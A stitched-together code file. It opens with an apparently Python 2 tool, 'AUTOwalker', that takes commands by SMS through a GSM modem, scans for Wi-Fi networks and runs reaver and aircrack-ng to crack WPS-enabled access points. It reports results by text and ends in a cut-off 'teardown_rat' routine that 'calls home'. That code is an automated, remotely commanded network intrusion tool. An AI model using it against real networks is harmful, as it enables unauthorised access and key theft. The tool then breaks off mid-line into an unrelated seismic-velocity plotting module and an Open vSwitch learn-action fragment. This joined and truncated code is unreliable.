def deauth(interface='wlan1mon', channel='1'):
    """
    Stub deauthentication attack; not implemented, always returns -1.

    Uses the print() function form (valid in both Python 2 and 3 for a single
    argument) instead of the original Python-2-only print statement.
    """
    print('deauth started')
    return -1
def send_text(text, path='/dev/ttyUSB1'):
    """
    Send `text` as one or more SMS messages through a GSM modem on `path`.

    The text is split into 130-character chunks; each chunk is sent as its own
    SMS using standard AT commands, blocking until the modem confirms with a
    +CMGS response.
    """
    # Placeholder: must be replaced with the destination phone number.
    number='insert your number here'
    print len(text)
    for chunk in chunks(text,130):
        ser = serial.Serial(path, baudrate=115200, dsrdtr=True, rtscts=True, timeout=1)
        # set text mode
        ser.write('AT+CMGF=%d\r' % 1)
        time.sleep(1)
        ser.readlines()
        # set encoding
        ser.write('AT+CSCS="GSM"\r')
        time.sleep(1)
        ser.readlines()
        # set number
        ser.write('AT+CMGS="%s"\r' % number)
        time.sleep(1)
        ser.readlines()
        # send message
        ser.write(chunk.encode("utf-8", "ignore"))
        # Ctrl-Z terminates SMS input in AT text mode.
        ser.write('\x1a')
        # Poll modem output until the +CMGS send confirmation appears.
        # NOTE(review): loops forever if the modem never confirms.
        escapeVariable = False
        line=ser.readlines()
        while escapeVariable is not True:
            print line
            for item in line:
                if "+CMGS: " in item:
                    escapeVariable = True
            line=ser.readlines()
        ser.close()
        time.sleep(1)
def receive_text(path='/dev/ttyUSB1'):
    """
    Read the oldest unread SMS from the GSM modem on `path`.

    Returns the message line from the modem output, or 'CONTINUE' when there
    is nothing new to process.
    """
    # Start serial comms
    modem = serial.Serial(path, baudrate=115200, dsrdtr=True, rtscts=True, timeout=1)
    # Set text mode
    modem.write('AT+CMGF=1\r')
    # Request unread SMSes
    modem.write('AT+CMGL="REC UNREAD"\r')
    # Read output
    response = modem.readlines()
    # Close connection
    modem.close()
    print str(response).strip()
    # NOTE(review): assumes the message body sits 3 lines from the end of the
    # modem output; this is modem/firmware specific — confirm on real hardware.
    if str(response[-3]).strip() != 'OK':
        return str(response[-3]).strip()
    else:
        return 'CONTINUE'
def purge_texts(path='/dev/ttyUSB1'):
    """Delete all stored SMS messages from the GSM modem on `path`."""
    # Start serial comms
    modem = serial.Serial(path, baudrate=115200, dsrdtr=True, rtscts=True, timeout=1)
    # Set text mode
    modem.write('AT+CMGF=1\r')
    # Delete all SMSes
    modem.write('AT+CMGD=0,3\r')
    # Ensure that unsent SMSes are purged, just to be sure.
    modem.write('\x1a')
    # Read output
    response = modem.readlines()
    # Close connection
    modem.close()
    print response
def parse_command(command=''):
    """
    Parse a space-separated command string (as received via SMS) into an
    options dict.

    Value flags (-i/-b/-t/-c/-f/-s/-o) consume the following token; boolean
    flags toggle their option. Unknown tokens are ignored. 'timeout' is
    converted to int; all other values remain strings.
    """
    tokens = str(command).split(' ')
    options = {'interface': '',
               'bssid': '',
               'timeout': '',
               'channel': '',
               'output_format': '',
               'source_file': '',
               'output_file': '',
               'continue_reaver': False,
               'wps_scan': False,
               'verbose': False,
               'monitor': False,
               'open_networks': False}
    value_flags = {'-i': 'interface',
                   '-b': 'bssid',
                   '-c': 'channel',
                   '-f': 'output_format',
                   '-s': 'source_file',
                   '-o': 'output_file'}
    boolean_flags = {'-wps': ('wps_scan', True),
                     '-vv': ('verbose', True),
                     '-stop': ('monitor', False),
                     '-start': ('monitor', True),
                     '-cr': ('continue_reaver', True),
                     '-open': ('open_networks', True)}
    # Bug fix: iterate with enumerate(). The original used list.index(item),
    # which always finds the FIRST occurrence of a token and therefore read
    # the wrong value when a flag (or an identical token) appeared twice.
    for position, token in enumerate(tokens):
        if token == '-t':
            options['timeout'] = int(tokens[position + 1])
        elif token in value_flags:
            options[value_flags[token]] = tokens[position + 1]
        elif token in boolean_flags:
            option_name, option_value = boolean_flags[token]
            options[option_name] = option_value
    return options
def process_dump(extension='.csv', source_file='AUTOwalker_Airodump'):
    """
    Parse an airodump-ng CSV dump and return up to 15 visible access points.

    Reads '<source_file>-01<extension>', skips the two header lines, collects
    one dict per AP row until the blank separator line, filters out rows with
    Power == '-1' (airodump's "unknown" marker), and returns the first 15
    entries sorted by the Power column.
    """
    fields = ['BSSID', 'First time seen', 'Last time seen', 'Channel', 'Speed',
              'Privacy', 'Cypher', 'Auth', 'Power', '#beacons', '#IVS',
              'lanIP', 'ID-Length', 'ESSID', 'key']
    filename = source_file + '-01' + extension
    rows = []
    # `with` ensures the dump file is closed even if a malformed row raises
    # (the original leaked the handle on any parse error).
    with open(filename, 'r') as dump_file:
        # Read top two lines to move the cursor down past the header.
        dump_file.readline()
        dump_file.readline()
        for line in dump_file:
            # A blank line separates the AP table from the client table.
            if str(line) in ['\n', '\r\n']:
                break
            columns = [column.strip() for column in str(line).split(',')]
            record = dict(zip(fields, columns))
            if record['Power'] != '-1':
                rows.append(record)
    # NOTE(review): Power values are compared and sorted as strings, so the
    # ordering is lexicographic (e.g. '-100' < '-40'); preserved as-is to
    # keep the original ranking behavior — confirm intent before changing.
    rows = sorted(rows, key=lambda record: record['Power'], reverse=False)
    return rows[:15]
def process_wash(airodumpFileOutput):
    """
    Cross-reference a wash WPS survey with airodump output.

    Parses the fixed 'AUTOwalker_wash' file, keeps APs whose WPS is not
    locked, and builds a '|'-separated summary string of 'ESSID BSSID Power'
    for every airodump AP that also appears in the wash results.
    """
    source_file='AUTOwalker_wash'
    filename = source_file
    dumpFile = open(filename,'r')
    splitLines = []
    lineDictionary = {'BSSID':'',
                      'Channel':'',
                      'RSSI':'',
                      'WPS Version':'',
                      'Locked':'',
                      'ESSID':''}
    # Skip the two header lines of the wash output.
    dumpFile.readline()
    dumpFile.readline()
    for line in dumpFile:
        if str(line) in ['\n', '\r\n']:
            break
        # NOTE(review): wash output is split on double spaces; the field
        # positions below are layout-dependent — confirm against the wash
        # version in use.
        singleLine = str(line).split('  ')
        lineDictionary['BSSID'] = singleLine[0].strip()
        lineDictionary['Channel'] = singleLine[1].strip()
        lineDictionary['RSSI'] = singleLine[3].strip()
        lineDictionary['WPS Version'] = singleLine[4].strip()
        lineDictionary['Locked'] = singleLine[6].strip()
        lineDictionary['ESSID'] = singleLine[8].strip()
        # Only keep APs whose WPS is not locked (still attackable).
        if lineDictionary['Locked'] != 'Yes':
            splitLines.append(lineDictionary.copy())
    builtMessage = ''
    # Intersect airodump APs with WPS-enabled wash APs.
    for dump_ID in airodumpFileOutput:
        for wash_ID in splitLines:
            if dump_ID['BSSID'] == wash_ID['BSSID']:
                builtMessage += dump_ID['ESSID']
                builtMessage += ' '
                builtMessage += dump_ID['BSSID']
                builtMessage += ' '
                builtMessage += dump_ID['Power']
                builtMessage += '|'
    dumpFile.close()
    return builtMessage
def process_reaver(source_file='AUTOwalker_reaver'):
    """
    Inspect reaver's output file and classify the crack progress.

    :param source_file: path to reaver's output file (the previously
        hard-coded 'AUTOwalker_reaver' remains the default, so existing
        callers are unaffected).
    :returns: -1 if AP rate limiting was detected; the seconds-per-pin value
        (int) if timing info was found; -2 if a WPA PSK was recovered; None
        when nothing matched.
    """
    # `with` guarantees the handle is closed; the original leaked it when the
    # loop finished without matching any pattern.
    with open(source_file, 'r') as dump_file:
        for line in dump_file:
            if 'WARNING: Detected AP rate limiting' in line:
                # Limited rate, abort crack.
                return -1
            if 'seconds/pin' in line:
                print(line)
                # Field 6 looks like '(N' — strip the leading parenthesis.
                seconds_field = str(line).split(' ')[6]
                print(seconds_field)
                seconds_field = seconds_field[1:]
                print(seconds_field)
                return int(seconds_field)
            if 'WPA PSK' in line:
                # Key recovered; the caller reports it out-of-band.
                return -2
    return None
def process_crack(source_file=''):
    """Return the first line (the recovered password) of a crack output file."""
    with open(source_file, 'r') as dump_file:
        password = dump_file.readline()
    return password
def iwconfig(interface='wlan1'):
    """Return True if `interface` appears in `sudo iwconfig` output."""
    print 'iwconfig started'
    process = subprocess.Popen(["sudo","iwconfig"],
                    stdout=subprocess.PIPE,
                    stdin=subprocess.PIPE,
                    universal_newlines=True)
    (output, error) = process.communicate()
    # Substring match: 'wlan1' also matches e.g. 'wlan1mon'.
    if interface in str(output):
        return True
    else:
        return False
def airmon_ng(interface='wlan1', timeout=30, monitor=True):
    """
    Start (monitor=True) or stop (monitor=False) monitor mode on `interface`
    via airmon-ng. Always returns -1.
    """
    # NOTE(review): `timeout` is accepted but never used.
    # NOTE(review): the `is True` / `is False` identity checks mean any other
    # truthy/falsy value (e.g. 1) leaves `process` unbound and the
    # communicate() call below raises — confirm callers only pass real bools.
    print 'airmon started'
    if monitor is True:
        process = subprocess.Popen(["sudo", "airmon-ng", "start", interface],
                        stdout=subprocess.PIPE,
                        stdin=subprocess.PIPE,
                        universal_newlines=True)
    elif monitor is False:
        process = subprocess.Popen(["sudo", "airmon-ng", "stop", interface],
                        stdout=subprocess.PIPE,
                        stdin=subprocess.PIPE,
                        universal_newlines=True)
    (output, error) = process.communicate()
    #print(output)
    return -1
def airodump_ng(interface='wlan1mon', channel='', output_file='AUTOwalker_Airodump', output_format = 'csv', timeout=1, open_flag = False):
    """
    Run airodump-ng on `interface` for `timeout` seconds, writing results to
    `output_file` in `output_format`. Always returns -1.
    """
    print('airodump started on '+interface)
    # Archive the previous capture so a fresh '-01' dump file is written.
    os.system('sudo mv AUTOwalker_Airodump-01.'+output_format+' Dumps/Airodump_'+str(datetime.datetime.now()).replace(" ","")+'.'+output_format)
    time.sleep(5)
    parameterList = ['sudo', 'airodump-ng', interface]
    if channel != '':
        parameterList.append('-c')
        parameterList.append(channel)
    if open_flag:
        # Restrict the scan to open (unencrypted) networks only.
        parameterList.append('--encrypt')
        parameterList.append('OPN')
    parameterList.append('--write')
    parameterList.append(output_file)
    parameterList.append('--output-format')
    parameterList.append(output_format)
    parameterList.append('--wps')
    parameterList.append('--ignore-negative-one')
    print parameterList
    process = subprocess.Popen(parameterList,
                    stdout=subprocess.PIPE,
                    stdin=subprocess.PIPE,
                    universal_newlines=True)
    # airodump-ng runs until killed; bound the scan with a sleep + killall.
    time.sleep(timeout)
    os.system('sudo killall airodump-ng')
    return -1
def aircrack_ng(bssid='', output_file='', source_file='', timeout=30):
    """
    Run aircrack-ng against a capture file and block until it finishes.

    Returns False when no source file is given, True otherwise.
    """
    # NOTE(review): `timeout` is accepted but never used; wait() blocks
    # indefinitely.
    parameterList = ['sudo', 'aircrack-ng']
    if bssid != '':
        parameterList.append('-b')
        parameterList.append(bssid)
    if output_file != '':
        # -l writes any recovered key to output_file.
        parameterList.append('-l')
        parameterList.append(output_file)
    if source_file != '':
        parameterList.append(source_file)
    else:
        return False
    print 'aircrack started'
    print parameterList
    process = subprocess.Popen(parameterList,
                    stdout=subprocess.PIPE,
                    stdin=subprocess.PIPE,
                    universal_newlines=True)
    process.wait()
    return True
def wash(interface='wlan1mon', timeout=30):
    """
    Survey WPS-enabled access points with wash for `timeout` seconds,
    writing results to the fixed 'AUTOwalker_wash' file.

    Returns False when no interface is given, True otherwise.
    """
    if interface == '':
        return False
    print 'wash started'
    output_file = 'AUTOwalker_wash'
    process = subprocess.Popen(['sudo',
                                'wash',
                                '-i', interface,
                                '-o', output_file,
                                '-C'],
                    stdout=subprocess.PIPE,
                    stdin=subprocess.PIPE,
                    universal_newlines=True)
    # wash runs until killed; bound the survey with a sleep + killall.
    time.sleep(int(timeout))
    os.system('sudo killall wash')
    return True
def reaver(interface='wlan1mon', bssid='', timeout=30, continue_crack=False):
    """
    Run a reaver WPS attack against `bssid`, polling its output twice over
    `timeout` seconds and reporting the outcome via SMS.

    Returns False for missing arguments, True when a key was recovered, and
    None otherwise.
    """
    if bssid == '':
        return False
    if interface == '':
        return False
    print 'reaver started'
    # Session files let reaver resume a previous attack on the same AP.
    sessionFileName = '/usr/local/etc/reaver/' + bssid.replace(':','') + '.wpc'
    os.system('rm AUTOwalker_reaver')
    if continue_crack == True:
        process = subprocess.Popen(['sudo',
                                    'reaver',
                                    '-i', interface,
                                    '-b', bssid,
                                    '-s', sessionFileName,
                                    '-o', 'AUTOwalker_reaver'],
                        stdout=subprocess.PIPE,
                        stdin=subprocess.PIPE,
                        universal_newlines=True)
    elif continue_crack == False:
        # Fresh attack: discard any stale session file first.
        os.system('rm '+sessionFileName)
        process = subprocess.Popen(['sudo',
                                    'reaver',
                                    '-i', interface,
                                    '-b', bssid,
                                    '-vv',
                                    '-o', 'AUTOwalker_reaver'],
                        stdout=subprocess.PIPE,
                        stdin=subprocess.PIPE,
                        universal_newlines=True)
    # Check progress at the halfway mark and again at the end.
    time.sleep(timeout/2)
    process_reaver() #optimize this, pass the file handler along, to only read where you left off.
    time.sleep(timeout/2)
    returnCode = process_reaver()
    # NOTE(review): process_reaver() may return None (no pattern matched);
    # `None >= 10` below raises under Python 3 — fine on Python 2 only.
    if returnCode == -1:
        process.send_signal(signal.SIGINT)
        print('limited')
        send_text('ABORTED: Rate Limited for '+bssid)
        #return -1
        #Send a text message that the AP is limited, crack is not viable
    elif returnCode >= 10:
        process.send_signal(signal.SIGINT)
        print('takestoolong')
        send_text('ABORTED: Takes too long on '+bssid)
        #return -11
        #Send a text message that the pins take a long time. Continuation of crack is possible.
    elif returnCode == -2:
        process.send_signal(signal.SIGINT)
        print('itworks')
        return True
def teardown_rat():
print 'Calling home and tearing down!'
wvdialConfig = 'call_home'
wvdialNetworkConfig = 'network'
callHome = ['sudo', 'screen', '-d', | |
# File: pycvm/horizontal_slice.py
##
# @file horizontal_slice.py
# @brief Plots a horizontal slice either for display or saving to a file.
# @author <NAME> - SCEC <<EMAIL>>
# @version 14.7.0
#
# Allows for generation of a horizontal slice, either interactively, via
# arguments, or through Python code in the class HorizontalSlice.
# Imports
from mpl_toolkits import basemap
from mpl_toolkits.basemap import cm
from common import Plot, Point, MaterialProperties, UCVM, UCVM_CVMS, \
math, pycvm_cmapDiscretize, cm, mcolors, basemap, np, plt
##
# @class HorizontalSlice
# @brief Plots a horizontal slice starting at a given @link common.Point Point @endlink
# to another @link common.Point Point @endlink.
#
# Generates a horizontal slice that can either be displayed to the user, saved to a file
# or differenced with another plot.
class HorizontalSlice:
##
# Initializes the horizontal slice. The slice will go from the upper-left
# @link common.Point Point @endlink parameter to the bottom-right
# @link common.Point Point @endlink parameter, at the depth specified in the
# upper-left point.
#
# @param upperleftpoint The @link common.Point starting point @endlink from which this plot should start.
# @param bottomrightpoint The @link common.Point ending point @endlink at which this plot should end.
# @param meta The metadata to hold configuration values
#
def __init__(self, upperleftpoint, bottomrightpoint, meta=None):
    """Initialize the horizontal slice from two corner points and a config dict.

    The slice spans from the upper-left Point to the bottom-right Point at
    the depth carried by the upper-left point.

    @param upperleftpoint The @link common.Point starting point @endlink from which this plot should start.
    @param bottomrightpoint The @link common.Point ending point @endlink at which this plot should end.
    @param meta The metadata dict holding configuration values (may be None).
    @raise TypeError when either corner is not a common.Point.
    @raise ValueError when the corners are not in upper-left / bottom-right order.
    """
    # Use a None sentinel instead of a mutable default dict, which would be
    # shared across every instance constructed without an explicit meta.
    self.meta = meta if meta is not None else {}
    ## Optional grid dimensions and file paths (None when not configured).
    self.xsteps = self.meta.get('nx')
    self.ysteps = self.meta.get('ny')
    self.datafile = self.meta.get('datafile')
    self.filename = self.meta.get('outfile')
    if not isinstance(upperleftpoint, Point):
        raise TypeError("Parameter upperleftpoint must be of type Point.")
    ## The upper-left point from which this plot should originate.
    self.upperleftpoint = upperleftpoint
    if not isinstance(bottomrightpoint, Point):
        raise TypeError("Parameter bottomrightpoint must be of type Point.")
    ## The bottom-right corner at which this plot should end.
    self.bottomrightpoint = bottomrightpoint
    # Check that the bottom-right point is below and right of the upper-left point.
    if (self.upperleftpoint.longitude > self.bottomrightpoint.longitude) or \
       (self.upperleftpoint.latitude < self.bottomrightpoint.latitude):
        raise ValueError("The upper-left point must be higher than, and to the " + \
                         "left of, the bottom-right point.")
    if 'spacing' in self.meta:
        ## The spacing for the plot, defined in degrees.
        self.spacing = self.meta['spacing']
        try:
            self.spacing = float(self.spacing)
        except Exception:
            # NOTE(review): a meters-to-degrees conversion was planned here
            # but never implemented upstream; the placeholder is preserved.
            print("TODO")
    ## The community velocity model from which the data should be retrieved.
    self.cvm = self.meta.get('cvm')
    ## UCVM installation directory and config file (None -> UCVM defaults).
    self.installdir = self.meta.get('installdir')
    self.configfile = self.meta.get('configfile')
    ## Optional plot title override.
    self.title = self.meta.get('title')
##
# Retrieves the values for this horizontal slice and stores them in the class.
def getplotvals(self, mproperty="vs"):
    """Retrieve the values for this horizontal slice and store them in the class.

    Fills self.materialproperties (a num_y x num_x grid) either from a
    previously exported datafile (.raw or .bin) or by querying UCVM.

    @param mproperty The material property name to set when reading a datafile.
    """
    ## The plot width - needs to be stored as property for the plot function to work.
    self.plot_width = self.bottomrightpoint.longitude - self.upperleftpoint.longitude
    ## The plot height - needs to be stored as a property for the plot function to work.
    self.plot_height = self.upperleftpoint.latitude - self.bottomrightpoint.latitude
    ## The number of x points we retrieved. Explicit nx overrides spacing-derived counts.
    if self.xsteps:
        self.num_x = int(self.xsteps)
    else:
        self.num_x = int(math.ceil(self.plot_width / self.spacing)) + 1
    ## The number of y points we retrieved. Explicit ny overrides spacing-derived counts.
    if self.ysteps:
        self.num_y = int(self.ysteps)
    else:
        self.num_y = int(math.ceil(self.plot_height / self.spacing)) + 1
    ## The 2D array of retrieved material properties, indexed [y][x].
    # (Distinct loop variables: the original shadowed `x` in both positions.)
    self.materialproperties = [[MaterialProperties(-1, -1, -1) for _col in range(self.num_x)]
                               for _row in range(self.num_y)]
    u = UCVM(install_dir=self.installdir, config_file=self.configfile)
    if self.datafile is not None:
        # Load previously exported values instead of querying UCVM.
        if self.datafile.rfind(".raw") != -1:
            data = u.import_raw_data(self.datafile, self.num_x, self.num_y)
        else:  ## with .bin file
            data2d = u.import_np_float_array(self.datafile, self.num_x, self.num_y)
            ## flatten the 2D array into a plain Python list
            data = data2d.reshape([1, self.num_x * self.num_y])[0].tolist()
        print("\nUsing --> " + self.datafile)
    else:
        # Generate a list of points to pass to UCVM, row by row from the
        # bottom latitude upward.
        ucvmpoints = []
        for y in range(0, self.num_y):
            for x in range(0, self.num_x):
                ucvmpoints.append(Point(self.upperleftpoint.longitude + x * self.spacing, \
                                        self.bottomrightpoint.latitude + y * self.spacing, \
                                        self.upperleftpoint.depth))
        data = u.query(ucvmpoints, self.cvm)
    # Datafile input yields bare floats for one property; UCVM queries yield
    # full MaterialProperties objects.
    isfloat = self.datafile is not None
    i = 0
    j = 0
    for matprop in data:
        if isfloat:
            self.materialproperties[i][j].setProperty(mproperty, matprop)
        else:
            self.materialproperties[i][j] = matprop
        # Advance column-first, wrapping to the next row at num_x.
        j += 1
        if j >= self.num_x:
            j = 0
            i += 1
##
# Plots the horizontal slice either to an image or a file name.
#
def plot(self, horizontal_label = None):
if self.upperleftpoint.description == None:
location_text = ""
else:
location_text = self.upperleftpoint.description + " "
if 'data_type' in self.meta :
mproperty = self.meta['data_type']
else:
mproperty = "vs"
scale_gate = None
if 'color' in self.meta :
color_scale = self.meta['color']
if 'gate' in self.meta :
scale_gate = float(self.meta['gate'])
if color_scale == "b" and scale_gate is None:
scale_gate=2.5
# Gets the better CVM description if it exists.
try:
cvmdesc = UCVM_CVMS[self.cvm]
except:
cvmdesc = self.cvm
if 'title' in self.meta :
title = self.meta['title']
else:
title = "%s%s Horizontal Slice at %.0fm" % (location_text, cvmdesc, self.upperleftpoint.depth)
self.meta['title'] = title
self.getplotvals(mproperty)
# Call the plot object.
p = Plot(title, "", "", None, 10, 10)
u = UCVM(install_dir=self.installdir, config_file=self.configfile)
BOUNDS = u.makebounds()
TICKS = u.maketicks()
m = basemap.Basemap(projection='cyl', llcrnrlat=self.bottomrightpoint.latitude, \
urcrnrlat=self.upperleftpoint.latitude, \
llcrnrlon=self.upperleftpoint.longitude, \
urcrnrlon=self.bottomrightpoint.longitude, \
resolution='f', anchor='C')
lat_ticks = np.arange(self.bottomrightpoint.latitude, self.upperleftpoint.latitude + 0.1, self.plot_height / 2)
lon_ticks = np.arange(self.upperleftpoint.longitude, self.bottomrightpoint.longitude + 0.1, self.plot_width / 2)
m.drawparallels(lat_ticks, linewidth=1.0, labels=[1,0,0,0])
m.drawmeridians(lon_ticks, linewidth=1.0, labels=[0,0,0,1])
m.drawstates()
m.drawcountries()
alons = np.arange(self.upperleftpoint.longitude, self.bottomrightpoint.longitude, self.spacing)
alats = np.arange(self.bottomrightpoint.latitude, self.upperleftpoint.latitude, self.spacing)
lons = np.linspace(self.upperleftpoint.longitude, self.bottomrightpoint.longitude - self.spacing, self.num_x-1)
lats = np.linspace(self.bottomrightpoint.latitude, self.upperleftpoint.latitude - self.spacing, self.num_y-1)
# Get the properties.
datapoints = np.arange(self.num_x * self.num_y,dtype=np.float32).reshape(self.num_y, self.num_x)
nancnt=0
zerocnt=0
negcnt=0
## print("total cnt is %d"%(self.num_x * self.num_y))
for i in range(0, self.num_y):
for j in range(0, self.num_x):
if (self.datafile != None) :
datapoints[i][j] = self.materialproperties[i][j].getProperty(mproperty)
elif mproperty != "poisson":
if color_scale == "sd" or color_scale == "sd_r":
datapoints[i][j] = self.materialproperties[i][j].getProperty(mproperty)
if(datapoints[i][j] == -1 ) :
datapoints[i][j]=np.nan
nancnt=nancnt+1
##to have blank background
## if (datapoints[i][j] == 0) :
## datapoints[i][j]=np.nan
## zerocnt=zerocnt+1
##
else:
datapoints[i][j] = self.materialproperties[i][j].getProperty(mproperty)
if (datapoints[i][j] == 0) :
# KEEP 0 as 0 datapoints[i][j]=np.nan
zerocnt=zerocnt+1
if (datapoints[i][j] < 0) :
negcnt=negcnt+1
if(datapoints[i][j] == -1 ) :
datapoints[i][j]=np.nan
nancnt=nancnt+1
else :
datapoints[i][j] = u.poisson(self.materialproperties[i][j].vs, self.materialproperties[i][j].vp)
# print(" total number of nancnt is "+str(nancnt))
# print(" total number of zerocnt is "+str(zerocnt))
# print(" total number of negcnt is "+str(negcnt))
myInt=1000
if mproperty == "poisson": ## no need to reduce.. should also be using sd or dd
myInt=1
if color_scale == "s" :
color_scale = "sd"
elif color_scale == "d" :
color_scale = "dd"
newdatapoints=datapoints/myInt
newmax_val=np.nanmax(newdatapoints)
newmin_val=np.nanmin(newdatapoints)
newmean_val=np.mean(newdatapoints)
self.max_val=np.nanmax(datapoints)
self.min_val=np.nanmin(datapoints)
self.mean_val=np.mean(datapoints)
if color_scale == "s":
colormap = basemap.cm.GMT_seis
norm = mcolors.Normalize(vmin=BOUNDS[0],vmax=BOUNDS[len(BOUNDS) - 1])
elif color_scale == "s_r":
colormap = basemap.cm.GMT_seis_r
norm = mcolors.Normalize(vmin=BOUNDS[0],vmax=BOUNDS[len(BOUNDS) - 1])
elif color_scale == "sd":
BOUNDS= u.makebounds(newmin_val, newmax_val, 5, newmean_val, substep=5)
# colormap = basemap.cm.GMT_globe
colormap = basemap.cm.GMT_seis
TICKS = u.maketicks(newmin_val, newmax_val, 5)
norm = mcolors.Normalize(vmin=BOUNDS[0],vmax=BOUNDS[len(BOUNDS) - 1])
elif color_scale == "b":
C = []
for bound in BOUNDS :
if bound < scale_gate :
C.append("grey")
else:
C.append("red")
colormap = mcolors.ListedColormap(C)
norm = mcolors.BoundaryNorm(BOUNDS, colormap.N)
elif color_scale == "d":
colormap = pycvm_cmapDiscretize(basemap.cm.GMT_seis, len(BOUNDS) - 1)
norm = mcolors.BoundaryNorm(BOUNDS, colormap.N)
elif color_scale == "d_r":
colormap = pycvm_cmapDiscretize(basemap.cm.GMT_seis_r, len(BOUNDS) - 1)
norm = mcolors.BoundaryNorm(BOUNDS, colormap.N)
elif color_scale == 'dd':
BOUNDS= u.makebounds(newmin_val, newmax_val, 5, newmean_val, substep=5,all=True)
TICKS = u.maketicks(newmin_val, newmax_val, 5)
colormap = pycvm_cmapDiscretize(basemap.cm.GMT_seis, len(BOUNDS) - 1)
# colormap = pycvm_cmapDiscretize(basemap.cm.GMT_globe, len(BOUNDS) - 1)
norm = mcolors.BoundaryNorm(BOUNDS, colormap.N)
else:
print("ERROR: unknown option | |
source address B in
* VLAN C, this would set up the flow "dl_dst=B, vlan_vid=C,
* actions=output:A".
*
* In syntax accepted by ovs-ofctl, this action is:
* learn(NXM_OF_VLAN_TCI[0..11], NXM_OF_ETH_DST[]=NXM_OF_ETH_SRC[],
* output:NXM_OF_IN_PORT[])
*
* 3. Here's a recipe for a very simple-minded MAC learning switch. It uses a
* 10-second MAC expiration time to make it easier to see what's going on
*
* ovs-vsctl del-controller br0
* ovs-ofctl del-flows br0
* ovs-ofctl add-flow br0 "table=0 actions=learn(table=1, \
hard_timeout=10, NXM_OF_VLAN_TCI[0..11], \
NXM_OF_ETH_DST[]=NXM_OF_ETH_SRC[], \
output:NXM_OF_IN_PORT[]), resubmit(,1)"
* ovs-ofctl add-flow br0 "table=1 priority=0 actions=flood"
*
* You can then dump the MAC learning table with:
*
* ovs-ofctl dump-flows br0 table=1
*
* Usage Advice
* ------------
*
* For best performance, segregate learned flows into a table that is not used
* for any other flows except possibly for a lowest-priority "catch-all" flow
* (a flow with no match criteria). If different learning actions specify
* different match criteria, use different tables for the learned flows.
*
* The meaning of 'hard_timeout' and 'idle_timeout' can be counterintuitive.
* These timeouts apply to the flow that is added, which means that a flow with
* an idle timeout will expire when no traffic has been sent *to* the learned
* address. This is not usually the intent in MAC learning; instead, we want
* the MAC learn entry to expire when no traffic has been sent *from* the
* learned address. Use a hard timeout for that.
*/
'''
def _nx_flow_mod_spec_formatter(x):
    # Human-readable formatter for a parsed nx_flow_mod_spec dict.
    # Writes an ovs-ofctl-style description into x['_desc'], e.g.
    # "NXM_OF_ETH_DST[]=NXM_OF_ETH_SRC[]", "load:0x01->REG0[0..7]" or
    # "output:NXM_OF_IN_PORT[]".
    if NX_FLOWMODSPEC_SRC(x['header']):
        # Immediate source: render the raw value bytes as one hex literal.
        srcdesc = '0x' + ''.join('%02x' % (c,) for c in bytearray(x['value']))
    else:
        # Field source: render as field[first_bit..last_bit].
        srcdesc = '%s[%d..%d]' % (x['src'], x['src_ofs'], x['src_ofs'] + NX_FLOWMODSPEC_NBITS(x['header']) - 1)
    dstv = NX_FLOWMODSPEC_DST(x['header'])
    if dstv != NX_LEARN_DST_OUTPUT:
        # MATCH and LOAD destinations name a field; OUTPUT has no dst field.
        dstdesc = '%s[%d..%d]' % (x['dst'], x['dst_ofs'], x['dst_ofs'] + NX_FLOWMODSPEC_NBITS(x['header']) - 1)
    if dstv == NX_LEARN_DST_MATCH:
        x['_desc'] = '%s=%s' % (dstdesc, srcdesc)
    elif dstv == NX_LEARN_DST_LOAD:
        x['_desc'] = 'load:%s->%s' % (srcdesc, dstdesc)
    elif NX_FLOWMODSPEC_SRC(x['header']):
        # OUTPUT with an immediate value: the 2-byte value is a port number.
        x['_desc'] = 'output:%s' % nxm_port_no_raw.formatter(common.create_binary(x['value'], 2))
    else:
        x['_desc'] = 'output:%s' % (srcdesc,)
    # Also replace the numeric header with its formatted description.
    x['header'] = nx_flow_mod_spec_header.formatter(x['header'])
    return x
# Wire format of one flow-mod spec element inside an NXAST_LEARN action:
# a 16-bit header followed by variable-size source and destination parts.
nx_flow_mod_spec = nstruct(
    (uint16, 'header'),
    (_nx_flow_mod_spec_src,),
    (_nx_flow_mod_spec_dst,),
    name = 'nx_flow_mod_spec',
    padding = 1,
    formatter = _nx_flow_mod_spec_formatter,
    lastextra = False
    # if x.header == 0, size is 14, the padding should not be so large so it will not be successfully parsed
)
namespace['nx_flow_mod_spec'] = nx_flow_mod_spec
def create_nxfms_matchfield(src, dst, src_ofs = 0, dst_ofs = 0, n_bits = None):
    """Build a field-to-match flow-mod spec: match dst against n_bits copied from src.

    When n_bits is None it defaults to the widest span both fields can hold
    from their respective offsets. Raises ValueError for a non-positive width.
    """
    if n_bits is None:
        n_bits = min(NXM_LENGTH(dst) * 8 - dst_ofs, NXM_LENGTH(src) * 8 - src_ofs)
    if n_bits <= 0:
        raise ValueError('Cannot create flow mod spec with 0 bits')
    return nx_flow_mod_spec.parse(_create_header(NX_LEARN_SRC_FIELD, NX_LEARN_DST_MATCH, n_bits) + _create_field(src, src_ofs) + _create_field(dst, dst_ofs))[0]
namespace['create_nxfms_matchfield'] = create_nxfms_matchfield
def create_nxfms_matchvalue(dst, value, dst_ofs, n_bits = None):
    """Build an immediate-to-match flow-mod spec: match dst against a literal value.

    The immediate is padded to a whole number of 16-bit words as the wire
    format requires. Raises ValueError for a non-positive width.
    """
    if n_bits is None:
        n_bits = NXM_LENGTH(dst) * 8 - dst_ofs
    if n_bits <= 0:
        raise ValueError('Cannot create flow mod spec with 0 bits')
    return nx_flow_mod_spec.parse(_create_header(NX_LEARN_SRC_IMMEDIATE, NX_LEARN_DST_MATCH, n_bits) + common.create_binary(value, (n_bits + 15) // 16 * 2) + _create_field(dst, dst_ofs))[0]
namespace['create_nxfms_matchvalue'] = create_nxfms_matchvalue
def create_nxfms_loadfield(src, dst, src_ofs = 0, dst_ofs = 0, n_bits = None):
    """Build a field-to-load flow-mod spec: load n_bits copied from src into dst.

    When n_bits is None it defaults to the widest span both fields can hold
    from their respective offsets. Raises ValueError for a non-positive width.
    """
    if n_bits is None:
        n_bits = min(NXM_LENGTH(dst) * 8 - dst_ofs, NXM_LENGTH(src) * 8 - src_ofs)
    if n_bits <= 0:
        raise ValueError('Cannot create flow mod spec with 0 bits')
    return nx_flow_mod_spec.parse(_create_header(NX_LEARN_SRC_FIELD, NX_LEARN_DST_LOAD, n_bits) + _create_field(src, src_ofs) + _create_field(dst, dst_ofs))[0]
namespace['create_nxfms_loadfield'] = create_nxfms_loadfield
def create_nxfms_loadvalue(dst, value, dst_ofs, n_bits = None):
    """Build an immediate-to-load flow-mod spec: load a literal value into dst.

